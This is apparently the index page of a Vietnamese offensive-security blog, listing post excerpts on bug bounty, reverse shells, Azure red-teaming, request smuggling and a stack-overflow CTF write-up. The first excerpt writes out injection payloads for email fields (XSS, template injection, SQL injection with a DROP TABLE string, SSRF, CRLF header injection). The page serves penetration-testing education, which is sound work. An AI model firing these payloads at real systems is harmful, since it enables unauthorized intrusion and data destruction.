nhattruongblog
[Bug Bounty]Một số payload khi test trường email
Chép lại cho các ông copy nhé, nhất các ông :v XSS test+(alert(0))@example.comtest@example(alert(0)).com“alert(0)”@example.com Template injection “<%=7*7%>”@example.comtest+(${{7*7}})@example.com SQLi “‘OR1=1–‘”@example.com“mail’);DROP TABLE users;–“@example.com SSRF john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1] Parameter pollution victim&email=attacker@example.com (Email) Header injection “%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com“recicpient@test.com>\r\nRCPT TO:<victim+”@test.com
Đọc tiếp
Reverseshell-Powercat-v2
Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.
Đọc tiếp
[Azure RedTeam] Tấn công “Ủy quyền Bất Hợp Pháp”(Illicit Consent Attack) trên Azure
Giới thiệu Azure App Service là một dịch vụ dựa trên HTTP để lưu trữ các ứng dụng web, API REST và mobile backends. Bạn có thể phát triển các ứng dụng bằng ngôn ngữ lập trình yêu thích của mình, chẳng hạn như .NET, .NET Core, Java, Ruby, Node.js, PHP hoặc Python. Các ứng…
Đọc tiếp
Outlook Form/Rule attack cheat sheet
Bài viết ngắn gọn cho tấn công Outlook form/rule attack, cách sử dụng công cụ ruler. Nguyên lý của tấn công này là tất cả các rule, custom form đều sẽ được đồng bộ nên có thể đăng nhập ở bất kỳ máy nào để thiết lập script độc hại. Đọc thêm: Công cụ Link…
Đọc tiếp
[Bugbounty Mindset Series] 2FA Bypass
Về mặt quản lý phiên: Về mặt Logic: Về mặt vượt ngưỡng: Khác: Tham khảo: twitter.com/hackerscrolls/status/1256276376019230720
Đọc tiếp
HTTP Request Smuggling toàn tập
I. HTTP request smuggling là gì? HTTP Request Smuggling là một kỹ thuật khai thác sự bất đồng bộ xử lý gói tin HTTP giữa máy chủ proxy/balancer/… với máy chủ web/backend. Lỗ hổng này thường gây ra các ảnh hưởng rất nghiệp trọng tới logic web thông thường. OK chúng ta sẽ cùng tìm…
Đọc tiếp
CÁC TIÊU CHÍ BẢO VỆ ỨNG DỤNG MOBILE
Bảo vệ ứng dụng mobile là một công việc không hề dễ, một ứng dụng mobile hiện đại (đặc biệt là tài chính, ngân hàng) sẽ phải đối mặt và gặp nhiều thách thức bởi sự tấn công của các tin tặc. nhattruong.blog xin đưa ra một số tiêu chí để bảo vệ cho ứng…
Đọc tiếp
ALIEN Language(Assembly x86) Part 1
Suốt quá trình phát triển của khoa học máy tính thì con người chúng ta luôn tìm cách để “bắt” máy tính hiểu những yêu cầu của mình. Nhưng bạn biết không thực ra máy tính chỉ có thể hiểu một ngôn ngữ duy nhất là machine code(mã máy). Trong khi chúng ta diễn giải…
Đọc tiếp
Top các CVE được khai thác nhiều nhất mọi thời đại (2017-now, keep updated)
Sau đây là top các lỗ hổng được hacker ưa chuộng nhất mọi thời đại (mọi thời đại là từ năm 2017 nhé ae :v). Có thể nói các bug hunter, hacker mà vớ được host có các lỗi này thì lại rất sướng, xiên không ngừng. Một phần các lỗi này ngày xưa cũng…
Đọc tiếp
XSS Polyglots: Test multiple XSS scenarios with ONE payload.
Use the payload for testing multiple XSS scenarios 🙂 That’s all
Đọc tiếp
Azure Redteam Cheatsheet
I. Reconnaissance (external) Update useful tool: https://github.com/nyxgeek/o365recon Find the subdomain of the target Using microBurst enum email: II. Reconnaissance (internal) Using RoadTool Using StormSpotter Using Bloodhound, Azurehound III. Initial attack Brute force Illicit Consent Grant attack. Using IV. Lateral movement Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code: Check Deployments…
Đọc tiếp
Protostar stack5 – Shellcode with stack overflows
OS: Parrot OS x64 Stack5.c: Build file: Checksec: Analasis: This is a simple task, x64 No protection (you can add more if you like :v) Execute /bin/sh Review main code: Check padding: => “A”*72 Check sp: sp => 0x00007fffffffe4c0 Get shellcode here: http://shell-storm.org/shellcode/files/shellcode-806.php Final code: Final
Đọc tiếp
Loading…
Something went wrong. Please refresh the page and/or try again.
Thông Tin 0day:
Thông Tin từ Exchange Team:
- An Toàn Thông Tin Cơ Bản (4)
- Android (2)
- Code standard (3)
- Cryptography (4)
- CTF (7)
- CVE (6)
- Hacking & RED TEAM (33)
- Azure (2)
- Buffer Over Flow (1)
- Bug Bounty (2)
- Common attacks (8)
- Local Attack (3)
- Pentest Mobile Application (1)
- Redteam verctors (2)
- XSS (3)
- installation & implementation (5)
- Malware (2)
- nhattruong.blog (7)
- Photo (1)
- Pwnable (2)
- Security Solutions (1)
- Security Tools (9)
android security An toàn thông tin kỷ niệm 70 năm thành lập ngành Ngân hàng Việt Nam app security backconnect buffer overflow CTF CVE CVE-2019-18935 CVE-2021-26084 Cơ Sở An Toàn Thông Tin deserialization docker dynamic loader frida frida-server frida gadget FridaGadget.config FridaGadget.dylib frida server frida trace gumjs Hide and seek hà nội LD_PRELOAD LearnPress MB MBBANK pentest phố đi bộ pwn python python 2 python 3 RCE rsa SQL injection Teachers Record Management System 1.0 telerik UI truongtn VSEC vulnerability WaTF-Bank wordpress write up XXS
About
Nhat Truong Blog 